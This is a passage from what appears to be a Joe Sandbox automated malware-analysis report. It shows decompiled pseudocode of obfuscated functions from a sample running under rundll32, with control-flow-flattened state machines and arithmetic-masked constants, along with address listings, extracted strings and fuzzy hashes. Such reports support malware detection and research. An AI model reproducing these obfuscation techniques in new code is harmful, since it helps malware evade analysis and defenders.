				_v92 = _v92 + 0xffffb151;
				_v92 = _v92 ^ 0xde981c2c;
				_v92 = _v92 ^ 0x2167c13f;
				_v48 = 0x349e;
				_v48 = _v48 | 0xa536c816;
				_v48 = _v48 ^ 0xa536ef12;
				_v172 = 0xab81;
				_t423 = 0x46;
				_v172 = _v172 * 0x33;
				_v172 = _v172 + 0xffff1acb;
				_v172 = _v172 ^ 0xbb3feb59;
				_v172 = _v172 ^ 0xbb1e804f;
				_v72 = 0x6207;
				_v72 = _v72 + 0xffff8a84;
				_v72 = _v72 ^ 0xffffdea5;
				_v80 = 0xb702;
				_v80 = _v80 * 0x71;
				_v80 = _v80 + 0xffff1180;
				_v80 = _v80 ^ 0x004fd1d8;
				_v40 = 0x81cb;
				_v40 = _v40 * 0x24;
				_v40 = _v40 ^ 0x001275f3;
				_v88 = 0x5eb0;
				_v88 = _v88 >> 3;
				_v88 = _v88 + 0x92b4;
				_v88 = _v88 ^ 0x0000b644;
				_v160 = 0x12e7;
				_v160 = _v160 ^ 0x069a79b3;
				_v160 = _v160 / _t423;
				_v160 = _v160 << 0xd;
				_v160 = _v160 ^ 0x04c33b64;
				_v84 = 0xf1f4;
				_v84 = _v84 | 0x342cde3b;
				_t424 = 0x1c;
				_v84 = _v84 / _t424;
				_v84 = _v84 ^ 0x01dd3282;
				_v116 = 0xb146;
				_t425 = 0x4f;
				_v116 = _v116 * 0x6c;
				_v116 = _v116 + 0xbfc7;
				_v116 = _v116 ^ 0x004bdc24;
				_v76 = 0x885c;
				_v76 = _v76 >> 3;
				_v76 = _v76 ^ 0x00003fd1;
				_v56 = 0xb3ed;
				_v56 = _v56 + 0xffff0d01;
				_v56 = _v56 ^ 0xffffed6a;
				_v108 = 0xc622;
				_v108 = _v108 | 0x10712732;
				_v108 = _v108 ^ 0x74f95923;
				_v108 = _v108 ^ 0x648892da;
				_v128 = 0x5bd2;
				_v128 = _v128 + 0x6edf;
				_v128 = _v128 >> 2;
				_v128 = _v128 ^ 0x00004896;
				_v164 = 0xe1b;
				_v164 = _v164 / _t425;
				_v164 = _v164 + 0xf341;
				_v164 = _v164 >> 0xb;
				_v164 = _v164 ^ 0x00001a6d;
				_v104 = 0x25ae;
				_v104 = _v104 ^ 0xe14689b4;
				_v104 = _v104 ^ 0x501c8677;
				_v104 = _v104 ^ 0xb15a3e2e;
				_v100 = 0xf2b8;
				_v100 = _v100 >> 4;
				_v100 = _v100 + 0x7f8b;
				_v100 = _v100 ^ 0x0000c2a8;
				_v64 = 0x78fc;
				_t426 = 0x2a;
				_v64 = _v64 / _t426;
				_v64 = _v64 ^ 0x000003c6;
				_v28 = 0x315;
				_v28 = _v28 | 0x8467cf1c;
				_v28 = _v28 ^ 0x84678c6c;
				_v36 = 0x48e3;
				_v36 = _v36 << 0x10;
				_v36 = _v36 ^ 0x48e34564;
				_v140 = 0xd9da;
				_v140 = _v140 ^ 0xccfa4b87;
				_v140 = _v140 >> 8;
				_v140 = _v140 + 0xb0ba;
				_v140 = _v140 ^ 0x00cde1b8;
				_v44 = 0xbd19;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x000065c0;
				_v136 = 0xd203;
				_v136 = _v136 | 0x5349dfd2;
				_v136 = _v136 + 0xffffa76d;
				_v136 = _v136 ^ 0xc21cb162;
				_v136 = _v136 ^ 0x91553623;
				_v24 = 0x8da7;
				_v24 = _v24 + 0xffff55dc;
				_v24 = _v24 ^ 0xffffe382;
				_v68 = 0xcfb5;
				_t427 = 0x28;
				_v68 = _v68 / _t427;
				_v68 = _v68 ^ 0x00000530;
				_t428 = _v12;
				_t357 = _v132;
				while(1) {
					L1:
					while(1) {
						_t439 = _t431 - 0x28e290b2;
						if(_t439 > 0) {
							goto L18;
						}
						L3:
						if(_t439 == 0) {
							_t386 = _t379;
							_t365 = E0021A970(_t379, _v112, _v152, _v144,  &_v4, _v120, _t380, _t380, _a12, _v20, _t380, _v124, _t380,  &_v12, _t380, _t380, _v92);
							_t437 =  &(_t437[0xf]);
							if(_t365 == 0) {
								L24:
								_t431 = 0x1c1c4d3a;
								goto L11;
							} else {
								_t368 = E00218C8F(_t386);
								_t431 = 0x30519b83;
								_t357 = _v12 * 0x2c + _t379;
								_v132 = _t357;
								_t428 =  >=  ? _t379 : (_t368 & 0x0000001f) * 0x2c + _t379;
								goto L12;
							}
							L34:
						} else {
							if(_t431 == _t413) {
								E002194DB(_v160, _v84, _t435,  &_v8, _v116, _v136, _v16, _v76);
								_t431 =  !=  ? 0x33392e52 : 0x221cfa57;
								_t357 = E00205FB2(_v56, _v108, _v16);
								_t437 =  &(_t437[8]);
								L29:
								_t380 = _v148;
								_t413 = 0x10c975df;
								goto L30;
							} else {
								if(_t431 == 0x1c1c4d3a) {
									E0020F536(_v100, _v64, _v28, _t435);
									_t431 = 0x205a5796;
									goto L11;
								} else {
									if(_t431 == 0x205a5796) {
										return E0020F536(_v36, _v140, _v44, _t379);
									}
									if(_t431 == 0x221cfa57) {
										_t428 = _t428 + 0x2c;
										asm("sbb esi, esi");
										_t431 = (_t431 & 0x14354e49) + 0x1c1c4d3a;
										continue;
									} else {
										if(_t431 != 0x2413af03) {
											L30:
											if(_t431 != 0x1b07e5ae) {
												_t357 = _v132;
												while(1) {
													_t439 = _t431 - 0x28e290b2;
													if(_t439 > 0) {
														goto L18;
													}
													goto L3;
												}
												goto L18;
											}
										} else {
											_push(_t380);
											_push(_t380);
											_t357 = E00208736(0x20000); // executed
											_t379 = _t357;
											if(_t379 != 0) {
												_t431 = 0x2c9da08a;
												L11:
												_t357 = _v132;
												L12:
												_t380 = _v148;
												goto L1;
											}
										}
									}
								}
							}
						}
						L33:
						return _t357;
						goto L34;
						L18:
						if(_t431 == 0x2c9da08a) {
							_push(_t380);
							_push(_t380);
							_t357 = E00208736(0x2000);
							_t435 = _t357;
							if(_t357 == 0) {
								_t431 = 0x205a5796;
								goto L29;
							} else {
								_t431 = 0x28e290b2;
								goto L11;
							}
						} else {
							if(_t431 == 0x30519b83) {
								_t361 = E0020F65F(_v68, _v72, _v80, _v40,  *_t428, _a12, _v88); // executed
								_t380 = _v148;
								_t437 =  &(_t437[5]);
								_v16 = _t361;
								_t357 = _v132;
								_t413 = 0x10c975df;
								_t431 =  !=  ? 0x10c975df : 0x221cfa57;
								continue;
							} else {
								if(_t431 == 0x33392e52) {
									E00217830(_v128, _t380, _t435, _v164, _v104, _v24);
									_t437 =  &(_t437[4]);
									goto L24;
								} else {
									if(_t431 != 0x3b64c246) {
										goto L30;
									} else {
										_t431 = 0x2413af03;
										continue;
									}
								}
							}
						}
						goto L33;
					}
				}
			}

0x002142da
0x002142e4
0x002142eb
0x002142ef
0x002142f6
0x002142fd
0x00214304
0x00214305
0x00214306
0x0021430b
0x00214316
0x00214319
0x00214323
0x0021432e
0x00214330
0x00214338
0x0021433d
0x00214342
0x00214344
0x00214348
0x0021434d
0x00214355
0x0021435d
0x00214365
0x0021436a
0x00214372
0x0021437d
0x00214388
0x00214393
0x0021439b
0x002143a0
0x002143a8
0x002143b0
0x002143b8
0x002143c3
0x002143cb
0x002143d6
0x002143de
0x002143ed
0x002143f0
0x002143f4
0x002143fc
0x00214404
0x00214409
0x00214411
0x00214419
0x00214421
0x00214429
0x0021442e
0x00214433
0x0021443b
0x00214443
0x0021444b
0x00214453
0x0021445b
0x00214463
0x0021446e
0x00214479
0x00214484
0x00214494
0x0021449c
0x0021449f
0x002144a3
0x002144ab
0x002144b3
0x002144bb
0x002144c3
0x002144cb
0x002144d6
0x002144e1
0x002144ee
0x002144fd
0x00214500
0x00214504
0x0021450c
0x00214514
0x0021451c
0x00214524
0x0021452c
0x00214534
0x00214541
0x00214545
0x0021454d
0x00214555
0x00214568
0x0021456f
0x0021457a
0x00214582
0x00214587
0x0021458f
0x00214597
0x0021459f
0x002145af
0x002145b3
0x002145b8
0x002145c0
0x002145c8
0x002145d4
0x002145d9
0x002145df
0x002145e7
0x002145f4
0x002145f5
0x002145f9
0x00214601
0x00214609
0x00214611
0x00214616
0x0021461e
0x00214629
0x00214634
0x0021463f
0x00214647
0x0021464f
0x00214657
0x0021465f
0x00214667
0x0021466f
0x00214674
0x0021467c
0x0021468a
0x0021468e
0x00214696
0x0021469b
0x002146a3
0x002146ab
0x002146b3
0x002146bb
0x002146c3
0x002146cb
0x002146d0
0x002146d8
0x002146e0
0x002146f0
0x002146f5
0x002146fe
0x00214709
0x00214714
0x0021471f
0x0021472a
0x00214735
0x0021473d
0x00214748
0x00214750
0x00214758
0x0021475d
0x00214765
0x0021476d
0x00214778
0x00214780
0x0021478b
0x00214793
0x0021479b
0x002147a3
0x002147ab
0x002147b3
0x002147be
0x002147c9
0x002147d4
0x002147e0
0x002147e3
0x002147e7
0x002147ef
0x002147f6
0x002147fa
0x002147fa
0x002147ff
0x002147ff
0x00214805
0x00000000
0x00000000
0x0021480b
0x0021480b
0x00214939
0x0021494b
0x00214950
0x00214955
0x002149e0
0x002149e0
0x00000000
0x0021495b
0x00214966
0x0021496e
0x00214980
0x00214984
0x00214988
0x00000000
0x00214988
0x00000000
0x00214811
0x00214813
0x002148d7
0x002148fa
0x002148fd
0x00214902
0x00214a70
0x00214a70
0x00214a74
0x00000000
0x00214819
0x0021481f
0x002148a2
0x002148a9
0x00000000
0x00214821
0x00214827
0x00000000
0x00214aa3
0x00214833
0x00214877
0x0021487c
0x00214884
0x00000000
0x00214835
0x0021483b
0x00214a79
0x00214a7f
0x00214a81
0x002147ff
0x002147ff
0x00214805
0x00000000
0x00000000
0x00000000
0x00214805
0x00000000
0x002147ff
0x00214841
0x00214850
0x00214851
0x00214857
0x0021485c
0x00214862
0x00214868
0x0021486d
0x0021486d
0x00214871
0x00214871
0x00000000
0x00214871
0x00214862
0x0021483b
0x00214833
0x0021481f
0x00214813
0x00214aae
0x00214aae
0x00000000
0x00214990
0x00214996
0x00214a4d
0x00214a4e
0x00214a54
0x00214a59
0x00214a5f
0x00214a6b
0x00000000
0x00214a61
0x00214a61
0x00000000
0x00214a61
0x0021499c
0x002149a2
0x00214a10
0x00214a15
0x00214a19
0x00214a1e
0x00214a25
0x00214a2e
0x00214a33
0x00000000
0x002149a4
0x002149aa
0x002149d8
0x002149dd
0x00000000
0x002149ac
0x002149b2
0x00000000
0x002149b8
0x002149b8
0x00000000
0x002149b8
0x002149b2
0x002149aa
0x002149a2
0x00000000
0x00214996
0x002147ff

Strings

dEH, xrefs: 0021473D
R.93, xrefs: 002148F0
R.93, xrefs: 002149A4
l), xrefs: 00214355
RESCDIR, xrefs: 00214852
+^, xrefs: 00214463

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: +^$R.93$R.93$RESCDIR$dEH$l)
API String ID: 0-1973027218
Opcode ID: 294b2cdd49b489d362fe55a9a898d7335e93e951b01ad7a576ca3362ab33ab2e
Instruction ID: 206f5c9ec127eb997be1f05474f011a3ddfe346895c3f037655b368e8294a14e
Opcode Fuzzy Hash: 294b2cdd49b489d362fe55a9a898d7335e93e951b01ad7a576ca3362ab33ab2e
Instruction Fuzzy Hash: D20243715083819FE368DF24C48AA9BFBE1FBD4314F108A1DE5D9962A0D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002102C3, Relevance: 7.7, Strings: 6, Instructions: 248
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E002102C3() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _t245;
				signed int _t247;
				void* _t249;
				signed int _t254;
				void* _t255;
				intOrPtr _t256;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t290;
				void* _t293;
				void* _t298;
				signed int* _t300;

				_t300 =  &_v676;
				_v580 = 0x66ae1;
				_v576 = 0xbd1a2;
				_v572 = 0x272c23;
				_t258 = 0x33;
				_t256 = 0;
				_t293 = 0x3b419076;
				_v568 = 0;
				_v640 = 0x1372;
				_v640 = _v640 / _t258;
				_v640 = _v640 | 0x4a3401ed;
				_v640 = _v640 ^ 0x4a34016d;
				_v660 = 0x5e98;
				_v660 = _v660 >> 0xe;
				_v660 = _v660 | 0x7267fa90;
				_t259 = 0x75;
				_v660 = _v660 / _t259;
				_v660 = _v660 ^ 0x00fa5318;
				_v652 = 0x5e75;
				_v652 = _v652 << 0x10;
				_v652 = _v652 + 0x48dc;
				_t260 = 0x18;
				_v652 = _v652 / _t260;
				_v652 = _v652 ^ 0x03efb4d1;
				_v608 = 0xe223;
				_t261 = 0x3f;
				_v608 = _v608 / _t261;
				_v608 = _v608 ^ 0x000070cc;
				_v656 = 0xb48f;
				_v656 = _v656 >> 6;
				_t262 = 0x3a;
				_v656 = _v656 / _t262;
				_v656 = _v656 + 0xde3a;
				_v656 = _v656 ^ 0x0000cbaf;
				_v612 = 0x15cc;
				_v612 = _v612 ^ 0x9ca6d169;
				_v612 = _v612 ^ 0x9ca6af9c;
				_v668 = 0xa8de;
				_v668 = _v668 << 5;
				_v668 = _v668 + 0xffff49ed;
				_t263 = 0x34;
				_v668 = _v668 / _t263;
				_v668 = _v668 ^ 0x00000193;
				_v596 = 0xe25b;
				_v596 = _v596 >> 4;
				_v596 = _v596 ^ 0x000030c3;
				_v636 = 0xc7ea;
				_v636 = _v636 << 0xa;
				_v636 = _v636 | 0x82c54243;
				_v636 = _v636 ^ 0x83dfaf9b;
				_v620 = 0x2a3e;
				_v620 = _v620 + 0xffff612f;
				_v620 = _v620 ^ 0xffffe842;
				_v644 = 0x52e;
				_t264 = 0x44;
				_v644 = _v644 * 0x2b;
				_v644 = _v644 + 0x1b45;
				_v644 = _v644 ^ 0x0000a38b;
				_v664 = 0x7c05;
				_v664 = _v664 / _t264;
				_v664 = _v664 + 0xfffff3de;
				_t265 = 0xd;
				_v664 = _v664 * 0x41;
				_v664 = _v664 ^ 0xfffd1fed;
				_v672 = 0x7153;
				_v672 = _v672 * 0x55;
				_v672 = _v672 + 0xffff3073;
				_v672 = _v672 | 0x19b2f735;
				_v672 = _v672 ^ 0x19b69e67;
				_v624 = 0x6a46;
				_v624 = _v624 << 6;
				_v624 = _v624 ^ 0x001a8e62;
				_v676 = 0x6586;
				_v676 = _v676 | 0x5a6bf539;
				_v676 = _v676 / _t265;
				_v676 = _v676 << 0xf;
				_v676 = _v676 ^ 0x4e5fab63;
				_v632 = 0x1a9f;
				_v632 = _v632 + 0x62a3;
				_v632 = _v632 ^ 0x000002a8;
				_v616 = 0x8464;
				_v616 = _v616 | 0x13bf265e;
				_v616 = _v616 ^ 0x13bfdd6d;
				_v592 = 0xbadb;
				_t266 = 0x3d;
				_t292 = _v632;
				_v592 = _v592 * 0x69;
				_v592 = _v592 ^ 0x004cce95;
				_v604 = 0xca90;
				_v604 = _v604 >> 0xc;
				_v604 = _v604 ^ 0x00007684;
				_v648 = 0x358b;
				_v648 = _v648 << 1;
				_v648 = _v648 << 9;
				_v648 = _v648 / _t266;
				_v648 = _v648 ^ 0x0003f328;
				_v600 = 0xe7dd;
				_v600 = _v600 ^ 0xaf509c9e;
				_v600 = _v600 ^ 0xaf5010b9;
				_v628 = 0xd224;
				_t245 = _v628;
				_t267 = 0x19;
				_t290 = _t245 % _t267;
				_v628 = _t245 / _t267;
				_v628 = _v628 ^ 0x00000864;
				do {
					while(_t293 != 0x47bbe06) {
						if(_t293 == 0xa25cde4) {
							_t249 = E0020F46D();
							_t298 = _v588 - _v548;
							asm("sbb ecx, [esp+0x94]");
							__eflags = _v584 - _t290;
							if(__eflags >= 0) {
								if(__eflags > 0) {
									L19:
									_t256 = 1;
									__eflags = 1;
								} else {
									__eflags = _t298 - _t249;
									if(_t298 >= _t249) {
										goto L19;
									}
								}
							}
						} else {
							if(_t293 == 0x13363d5d) {
								_t290 = _v604;
								_t267 = _v592;
								E0021AAAE(_t267, _t290, _v648,  &_v588, _v600);
								_t300 =  &(_t300[3]);
								_t293 = 0xa25cde4;
								continue;
							} else {
								if(_t293 == 0x1fdc46de) {
									_t290 = _v660;
									_t254 = E0020B566(_t267, _t290, _v656, _v612, _v640, _v668, _t267, _v596, _v636, _t256, _v620, _v644, _v628,  &_v524); // executed
									_t292 = _t254;
									_t300 =  &(_t300[0xc]);
									__eflags = _t254 - 0xffffffff;
									if(__eflags != 0) {
										_t293 = 0x47bbe06;
										continue;
									}
								} else {
									if(_t293 == 0x350fffd6) {
										_t290 =  &_v524;
										_t255 = E00213E3F(_t267, _t290, __eflags, _v652, _v608);
										_pop(_t267);
										__eflags = _t255;
										if(__eflags != 0) {
											_t293 = 0x1fdc46de;
											continue;
										}
									} else {
										if(_t293 != 0x3b419076) {
											goto L14;
										} else {
											_t293 = 0x350fffd6;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t256;
					}
					_push(_t267);
					_t247 = E00207F83( &_v564, _v664, _v672, _v624, _t292, _t267, _v676);
					_t290 = _v616;
					_t267 = _v632;
					asm("sbb esi, esi");
					_t293 = ( ~_t247 & 0xe3709c53) + 0x2fc5a10a; // executed
					__eflags = _t293;
					E00214F7D(_t267, _t290, _t292); // executed
					_t300 =  &(_t300[7]);
					L14:
					__eflags = _t293 - 0x2fc5a10a;
				} while (__eflags != 0);
				goto L20;
			}

0x002102c3
0x002102c9
0x002102d3
0x002102db
0x002102e9
0x002102ea
0x002102ec
0x002102f1
0x002102f5
0x00210305
0x0021030b
0x00210313
0x0021031b
0x00210323
0x00210328
0x00210334
0x00210339
0x0021033f
0x00210347
0x0021034f
0x00210354
0x00210360
0x00210365
0x0021036b
0x00210373
0x0021037f
0x00210384
0x0021038a
0x00210392
0x0021039a
0x002103a3
0x002103a8
0x002103ae
0x002103b6
0x002103be
0x002103c6
0x002103ce
0x002103d6
0x002103de
0x002103e3
0x002103ef
0x002103f2
0x002103f6
0x002103fe
0x00210406
0x0021040b
0x00210413
0x0021041b
0x00210420
0x00210428
0x00210430
0x00210438
0x00210440
0x00210448
0x00210459
0x00210461
0x00210465
0x0021046d
0x00210475
0x00210485
0x00210489
0x00210496
0x00210499
0x0021049d
0x002104a5
0x002104b2
0x002104b6
0x002104be
0x002104c6
0x002104ce
0x002104d6
0x002104db
0x002104e3
0x002104eb
0x002104fb
0x002104ff
0x00210504
0x0021050c
0x00210514
0x0021051c
0x00210524
0x0021052c
0x00210534
0x0021053c
0x00210549
0x0021054c
0x00210550
0x00210554
0x0021055c
0x00210564
0x00210569
0x00210571
0x00210579
0x0021057d
0x0021058a
0x0021058e
0x00210596
0x0021059e
0x002105a6
0x002105ae
0x002105b6
0x002105ba
0x002105bb
0x002105bd
0x002105c1
0x002105c9
0x002105c9
0x002105d7
0x002106f4
0x002106fd
0x00210708
0x0021070f
0x00210711
0x00210713
0x00210719
0x0021071b
0x0021071b
0x00210715
0x00210715
0x00210717
0x00000000
0x00000000
0x00210717
0x00210713
0x002105dd
0x002105e3
0x0021068a
0x0021068e
0x00210692
0x00210697
0x0021069a
0x00000000
0x002105e9
0x002105ef
0x0021065f
0x00210663
0x00210668
0x0021066a
0x0021066d
0x00210670
0x00210676
0x00000000
0x00210676
0x002105f1
0x002105f7
0x00210610
0x0021061b
0x00210621
0x00210622
0x00210624
0x0021062a
0x00000000
0x0021062a
0x002105f9
0x002105ff
0x00000000
0x00210605
0x00210605
0x00000000
0x00210605
0x002105ff
0x002105f7
0x002105ef
0x002105e3
0x0021071f
0x00210728
0x00210728
0x002106a4
0x002106be
0x002106c3
0x002106c9
0x002106d0
0x002106d8
0x002106d8
0x002106de
0x002106e3
0x002106e6
0x002106e6
0x002106e6
0x00000000

Strings

Fj, xrefs: 002104CE
#, xrefs: 00210373
Sq, xrefs: 002104A5
#,', xrefs: 002102DB
u^, xrefs: 00210347
[, xrefs: 002103FE

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #,'$#$Fj$Sq$[$u^
API String ID: 0-3347335214
Opcode ID: c47c2e617af9f90d504ce4957d9b81ea9ce1d44935f169193b34d947923a3a8b
Instruction ID: e67ec2b4778d8fc0ef52689a761b2a4726e722fd79cc26cd6a122e3775bfaa3f
Opcode Fuzzy Hash: c47c2e617af9f90d504ce4957d9b81ea9ce1d44935f169193b34d947923a3a8b
Instruction Fuzzy Hash: 71B152725083819FE358CF64C98944BFBE2BBC4758F108A1DF185562A0D7B99A99CF83

Uniqueness

Uniqueness Score: -1.00%

Function 0020EE78, Relevance: 5.2, Strings: 4, Instructions: 203
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E0020EE78() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				void* _t204;
				void* _t216;
				void* _t218;
				intOrPtr _t242;
				intOrPtr _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int* _t257;

				_t257 =  &_v1124;
				_v1056 = 0x181c5d;
				_v1052 = 0x367784;
				_t216 = 0x1144238d;
				_v1048 = 0x4ffcf6;
				_t248 = 0;
				_v1044 = 0;
				_v1088 = 0xda27;
				_t249 = 0x62;
				_v1088 = _v1088 * 0x3a;
				_t250 = 0x7a;
				_v1088 = _v1088 / _t249;
				_v1088 = _v1088 ^ 0x0000d2a1;
				_v1112 = 0x1719;
				_v1112 = _v1112 << 7;
				_v1112 = _v1112 + 0xffff2bf1;
				_v1112 = _v1112 | 0x98c770ba;
				_v1112 = _v1112 ^ 0x98cfba04;
				_v1096 = 0xeee5;
				_v1096 = _v1096 ^ 0xe08a058d;
				_v1096 = _v1096 | 0xf31efd60;
				_v1096 = _v1096 >> 0xd;
				_v1096 = _v1096 ^ 0x00079e87;
				_v1068 = 0x925f;
				_v1068 = _v1068 + 0xa627;
				_v1068 = _v1068 * 0xc;
				_v1068 = _v1068 ^ 0x000ee055;
				_v1076 = 0x1457;
				_v1076 = _v1076 * 0x3c;
				_t251 = 0x32;
				_v1076 = _v1076 / _t250;
				_v1076 = _v1076 ^ 0x00007f2a;
				_v1064 = 0x70c;
				_v1064 = _v1064 * 3;
				_v1064 = _v1064 ^ 0x000033a7;
				_v1080 = 0xbf13;
				_v1080 = _v1080 >> 0xf;
				_v1080 = _v1080 | 0xa6e1d279;
				_v1080 = _v1080 ^ 0xa6e18774;
				_v1072 = 0x855;
				_v1072 = _v1072 >> 6;
				_v1072 = _v1072 * 0x6d;
				_v1072 = _v1072 ^ 0x00004ced;
				_v1060 = 0x8e6f;
				_v1060 = _v1060 + 0xe76;
				_v1060 = _v1060 ^ 0x0000eeed;
				_v1116 = 0x7f13;
				_v1116 = _v1116 + 0x7bf9;
				_v1116 = _v1116 + 0xffffe522;
				_v1116 = _v1116 + 0x76b9;
				_v1116 = _v1116 ^ 0x000120a7;
				_v1124 = 0x4a8d;
				_v1124 = _v1124 + 0xb0fa;
				_t252 = 0x18;
				_v1124 = _v1124 / _t251;
				_v1124 = _v1124 ^ 0xe1689f92;
				_v1124 = _v1124 ^ 0xe168b829;
				_v1104 = 0x6fdc;
				_v1104 = _v1104 / _t252;
				_v1104 = _v1104 ^ 0xd1a01b12;
				_v1104 = _v1104 >> 0xd;
				_v1104 = _v1104 ^ 0x0006b7bc;
				_v1120 = 0x3441;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 | 0xb521b1d3;
				_v1120 = _v1120 ^ 0x6f352f49;
				_v1120 = _v1120 ^ 0xda14a570;
				_v1092 = 0xdaef;
				_v1092 = _v1092 + 0xffffef8f;
				_v1092 = _v1092 | 0x558b4159;
				_v1092 = _v1092 >> 0xb;
				_v1092 = _v1092 ^ 0x000a96bc;
				_v1084 = 0x9e65;
				_v1084 = _v1084 ^ 0xd37ef8f9;
				_t253 = 0x14;
				_v1084 = _v1084 / _t253;
				_v1084 = _v1084 ^ 0x0a9307fe;
				_v1100 = 0x36e3;
				_v1100 = _v1100 + 0xffff4219;
				_v1100 = _v1100 | 0x679c7357;
				_t254 = 0x3e;
				_v1100 = _v1100 * 0x7e;
				_v1100 = _v1100 ^ 0xffbf63c1;
				_v1108 = 0x25e;
				_v1108 = _v1108 / _t254;
				_v1108 = _v1108 | 0x82073b90;
				_v1108 = _v1108 * 0x30;
				_v1108 = _v1108 ^ 0x615b4461;
				do {
					while(_t216 != 0x295ca1) {
						if(_t216 == 0x1144238d) {
							_t216 = 0x274f9b22;
							continue;
						} else {
							if(_t216 == 0x1718f041) {
								E0020C0C6(_v1092, _v1084,  &_v1040, _v1100, _v1108); // executed
							} else {
								if(_t216 == 0x274f9b22) {
									E00213E3F(_t216,  &_v520, __eflags, _v1088, _v1112);
									_t216 = 0x295ca1;
									continue;
								} else {
									_t264 = _t216 - 0x3691f983;
									if(_t216 != 0x3691f983) {
										goto L10;
									} else {
										_push( &_v1040);
										_push( &_v520);
										E00207B63(_v1104, _v1120, _t264);
										_t248 =  !=  ? 1 : _t248;
										_t216 = 0x1718f041;
										continue;
									}
								}
							}
						}
						L13:
						return _t248;
					}
					_push(_v1068);
					_t204 = E0021889D(0x21c9b0, _v1096, __eflags);
					_pop(_t218);
					_t242 =  *0x21ca2c; // 0x495cc8
					_t176 = _t242 + 0x230; // 0x660053
					E0020C680(_t176, _v1064, _v1080, _t218, _v1072,  *0x21ca2c, _t204,  &_v1040);
					E00212025(_v1060, _t204, _v1116, _v1124);
					_t257 =  &(_t257[9]);
					_t216 = 0x3691f983;
					L10:
					__eflags = _t216 - 0x16e30c37;
				} while (__eflags != 0);
				goto L13;
			}

0x0020ee78
0x0020ee7e
0x0020ee88
0x0020ee90
0x0020ee95
0x0020eea1
0x0020eea3
0x0020eea7
0x0020eeb6
0x0020eeb9
0x0020eec3
0x0020eec4
0x0020eeca
0x0020eed2
0x0020eeda
0x0020eedf
0x0020eee7
0x0020eeef
0x0020eef7
0x0020eeff
0x0020ef07
0x0020ef0f
0x0020ef14
0x0020ef1c
0x0020ef24
0x0020ef33
0x0020ef37
0x0020ef3f
0x0020ef4c
0x0020ef56
0x0020ef57
0x0020ef5d
0x0020ef65
0x0020ef74
0x0020ef78
0x0020ef80
0x0020ef88
0x0020ef8d
0x0020ef95
0x0020ef9d
0x0020efa5
0x0020efaf
0x0020efb3
0x0020efbb
0x0020efc3
0x0020efcb
0x0020efd3
0x0020efdb
0x0020efe3
0x0020efeb
0x0020eff3
0x0020effb
0x0020f003
0x0020f011
0x0020f012
0x0020f016
0x0020f01e
0x0020f028
0x0020f038
0x0020f03e
0x0020f04b
0x0020f055
0x0020f05d
0x0020f065
0x0020f06a
0x0020f072
0x0020f07a
0x0020f082
0x0020f08a
0x0020f092
0x0020f09a
0x0020f09f
0x0020f0a7
0x0020f0af
0x0020f0bb
0x0020f0c0
0x0020f0c6
0x0020f0ce
0x0020f0d6
0x0020f0de
0x0020f0eb
0x0020f0ec
0x0020f0f0
0x0020f0f8
0x0020f106
0x0020f10a
0x0020f117
0x0020f11b
0x0020f123
0x0020f123
0x0020f12d
0x0020f190
0x00000000
0x0020f12f
0x0020f135
0x0020f215
0x0020f13b
0x0020f13d
0x0020f185
0x0020f18c
0x00000000
0x0020f13f
0x0020f13f
0x0020f145
0x00000000
0x0020f14b
0x0020f157
0x0020f15f
0x0020f160
0x0020f16c
0x0020f16f
0x00000000
0x0020f16f
0x0020f145
0x0020f13d
0x0020f135
0x0020f21d
0x0020f229
0x0020f229
0x0020f194
0x0020f1a1
0x0020f1a6
0x0020f1c2
0x0020f1cc
0x0020f1d2
0x0020f1e5
0x0020f1ea
0x0020f1ed
0x0020f1f2
0x0020f1f2
0x0020f1f2
0x00000000

Strings

aD[a, xrefs: 0020F11B
6, xrefs: 0020F0CE
L, xrefs: 0020EFB3
I/5o, xrefs: 0020F072

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

